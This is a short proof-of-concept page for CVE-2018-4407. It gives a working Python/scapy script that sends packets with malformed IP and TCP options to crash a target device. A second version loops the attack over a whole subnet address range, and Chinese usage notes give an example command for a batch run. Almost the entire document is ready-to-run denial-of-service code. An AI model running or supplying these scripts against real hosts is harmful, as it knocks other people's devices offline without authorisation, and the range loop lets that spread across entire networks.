CVE-2018-4407 POC

CVE-2018-4407 POC

import sys
try:
    from scapy.all import *
except Exception as e:
    print ("[*] You need install scapy first:\n[*] sudo pip install scapy ")
if __name__ == '__main__':
    try:
        check_ip = sys.argv[1]
        print ("[*] !!!!!!Dangerous operation!!!!!!")
        print ("[*] Trying CVE-2018-4407 ICMP DOS " + check_ip)
        for i in range(8,20):
            send(IP(dst=check_ip,options=[IPOption("A"*i)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))
        print ("[*] Check Over!! ")
    except Exception as e:
        print "[*] usage: sudo python CVE-2018-4407.py 127.0.0.1"

使用循环实现指定IP范围内所有设备的检查

import sys
ip_ori = sys.argv[1]
ip_start = sys.argv[2]
ip_end = sys.argv[3]
from scapy.all import *
for i in range(int(ip_start),int(ip_end)):
	ip = ip_ori+"."+str(i)
	# print (ip)
	print ("Trying CVE-2018-4407 ICMP DOS "+ip)
	for i in range(8,20):
		send(IP(dst=ip,options=[IPOption("A"*i)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))
	print ("[*] Check Over!! ")
	pass

使用方法

sudo python 4407.py 192.168.100 101 152
使用脚本批量检测 192.168.100网段 102-152的IP